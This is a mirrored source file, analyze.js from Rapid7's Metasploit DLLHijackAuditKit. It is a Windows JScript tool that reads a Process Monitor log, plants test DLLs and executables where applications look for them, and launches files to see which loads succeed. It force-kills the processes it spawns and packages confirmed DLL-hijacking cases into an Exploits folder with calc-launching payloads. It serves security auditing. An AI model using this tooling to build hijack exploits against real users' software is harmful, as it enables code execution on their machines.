CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/DLLHijackAuditKit/analyze.js
Views: 11766
1
/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */

2


3
var oFso = new ActiveXObject("Scripting.FileSystemObject");

4
var oShl = new ActiveXObject("WScript.Shell");

5
var oCWD = oShl.CurrentDirectory + "";

6


7


8
function print_status(msg) {

9
	try {

10
		WScript.StdOut.WriteLine("[*] "+ msg);

11
	} catch(e) {}

12
}

13


14
function process_list() {

15
	var res = new Array();

16
	var wbemFlagReturnImmediately = 0x10;

17
	var wbemFlagForwardOnly = 0x20;

18
	var oWMI = GetObject("winmgmts:\\\\localhost\\root\\CIMV2");

19
	var cPID = oWMI.ExecQuery("SELECT * FROM Win32_Process", "WQL", wbemFlagReturnImmediately | wbemFlagForwardOnly);

20
	var enumItems = new Enumerator(cPID);

21
	for (; !enumItems.atEnd(); enumItems.moveNext()) {

22
		var p = enumItems.item();

23
		if (p.ExecutablePath && p.ExecutablePath.toLowerCase().indexOf("taskmgr") != -1) continue;

24
		res.push(p.ProcessId);

25
	}

26
	return res;

27
}

28


29
function replace_payloads(dir, src) {

30
	var base = oFso.GetFolder(dir);

31
	var files = new Enumerator(base.files);

32
	for (; !files.atEnd(); files.moveNext()) {

33
		var entry = files.item().Name.toString().toLowerCase();

34
		if ( entry.indexOf("exploit.") == -1) {

35
			if (entry.toString().indexOf(".exe") != -1) {

36
				try { oFso.CopyFile(src + "\\runcalc.exe", dir + "\\" + entry); } catch(e) { }

37
			} else {

38
				try { oFso.CopyFile(src + "\\runcalc.dll", dir + "\\" + entry); } catch(e) { }

39
			}

40
		}

41
	}

42


43
	var subs = new Enumerator(base.SubFolders);

44
	for (; !subs.atEnd(); subs.moveNext()) {

45
		var entry = (subs.item() + "").toLowerCase();

46
		replace_payloads(entry, src);

47
	}

48
}

49


50


51
/* Process Logfile.CSV

52
	a) Make a list of applications and their associated DLLs

53
	b) Create a test case for each extension and each DLL

54
	c) Run each test case and look for "exploited.txt"

55
	d) Copy confirmed test cases to a new directory

56
*/

57


58


59
if (! oFso.FileExists("Logfile.CSV")) {

60
	print_status("Please save Logfile.CSV to the current directory first");

61
	WScript.Quit();

62
}

63


64
var procs = process_list();

65
print_status("Protecting " + procs.length + " processes");

66


67
var apps  = new Array();

68
var fCSV  = oFso.OpenTextFile("Logfile.CSV");

69
var line  = fCSV.ReadLine();

70
var iPath = 4;

71
var iProc = 1;

72
var bits  = line.split(",");

73


74
// Determine which fields are what index

75
for (var i=0; i < bits.length; i++) {

76
	if (bits[i].toLowerCase().indexOf("process name") != -1) {

77
		iProc = i;

78
	}

79
	if (bits[i].toLowerCase().indexOf("path") != -1) {

80
		iPath = i;

81
	}

82
}

83


84
// Parse the CSV into a map of each application's loads

85
while( ! fCSV.AtEndOfStream ) {

86
	line = fCSV.ReadLine();

87
	bits = line.replace(/\",/g, "\"||||").replace(/"/g, '').split("||||");

88


89
	var vApp = bits[iProc].toLowerCase();

90
	var vPath = bits[iPath].toLowerCase();

91
	var vExt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\")[0].toLowerCase();

92
	var vTgt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\");

93
	vTgt.shift();

94


95
	var vDll = vTgt.join("\\").toLowerCase();

96


97
	if (! apps[vApp]) apps[vApp] = new Array();

98
	if (! apps[vApp][vExt]) apps[vApp][vExt] = new Array();

99
	apps[vApp][vExt][vDll] = true;

100
}

101


102


103
print_status("Generating and validating test cases...");

104
try { oFso.CreateFolder(oCWD + "\\TestCases"); } catch(e) { }

105
try { oFso.CreateFolder(oCWD + "\\Exploits"); } catch(e) { }

106


107
for (var tApp in apps) {

108
	print_status(" Application: " + tApp);

109


110
	var aBase = oCWD + "\\TestCases\\" + tApp;

111
	try { oFso.CreateFolder(aBase); } catch(e) { }

112


113
	for (var tExt in apps[tApp]) {

114
		var eBase = aBase + "\\" + tExt;

115
		var aExploited = new Array();

116


117
		try { oFso.CreateFolder(eBase); } catch(e) { }

118
		for (var tDll in apps[tApp][tExt]) {

119
			var tBits = tDll.split("\\");

120
			var tName = tBits.pop();

121
			var dBase = eBase + "\\" + tName;

122
			try { oFso.CreateFolder(dBase); } catch(e) { }

123


124
			if (aExploited[tName]) continue;

125


126
			// tDll may be a subdirectory + DLL

127
			tPath = dBase;

128
			for (var y = 0; y < tBits.length; y++) {

129
				tPath = tPath + "\\" + tBits[y];

130
				try { oFso.CreateFolder(tPath); } catch(e) { }

131
			}

132
			tPath = tPath + "\\" + tName;

133


134
			try {

135
				if (tName.toLowerCase().indexOf(".exe") != -1) {

136
					oFso.CopyFile(oCWD + "\\runtest.exe", tPath);

137
				} else {

138
					oFso.CopyFile(oCWD + "\\runtest.dll", tPath);

139
				}

140
			} catch(e) { }

141


142
			// Create the actual test case file

143
			try {

144
				var a = oFso.CreateTextFile(dBase + "\\exploit." + tExt);

145
				a.WriteLine("HOWDY!");

146
				a.Close();

147
			} catch(e) { }

148


149


150
			try {

151
				// Run the test case

152
				oShl.CurrentDirectory = dBase;

153
				oShl.Run("cmd.exe /c start exploit." + tExt, 0);

154
			} catch(e) { }

155
			WScript.Sleep(500);

156


157
			var nprocs = process_list();

158
			var cnt = 0;

159
			while(nprocs.length == procs.length && cnt < 2) {

160
				cnt++;

161
				WScript.Sleep(500);

162
				nprocs = process_list();

163
			}

164


165
			// If an application spawned, give it three seconds

166
			// This helps with ProcMon memory usage as well

167
			if (nprocs.length > procs.length) {

168
				WScript.Sleep(3000);

169
			}

170


171
			var killer = "taskkill /F ";

172
			for (var i=0; i < nprocs.length; i++) {

173
				var found = false;

174
				for (var x=0; x < procs.length; x++) {

175
					if (nprocs[i] == procs[x]) {

176
						found = true;

177
						break;

178
					}

179
				}

180
				if (found) continue;

181
				killer = killer + "/PID " + nprocs[i] + " ";

182
			}

183
			oShl.Run(killer, 0, true);

184


185
			// Check for the file existence

186
			if (oFso.FileExists(dBase + "\\exploited.txt")) {

187


188
				print_status("Successfully exploited " + tApp + " with ." + tExt + " using " + tName);

189
				aExploited[tName] = true;

190
				var xBase = oCWD + "\\Exploits\\" + tApp + "_" + tExt + "_" + tName;

191
				try { oFso.CreateFolder(xBase); } catch(e) { }

192
				try { oFso.CopyFolder(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }

193
				try { oFso.CopyFile(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }

194
				try { oFso.DeleteFile(xBase + "\\exploited.txt"); } catch(e) { }

195
				replace_payloads(xBase, oCWD);

196
			}

197


198
		}

199


200
	}

201
}

202


203


204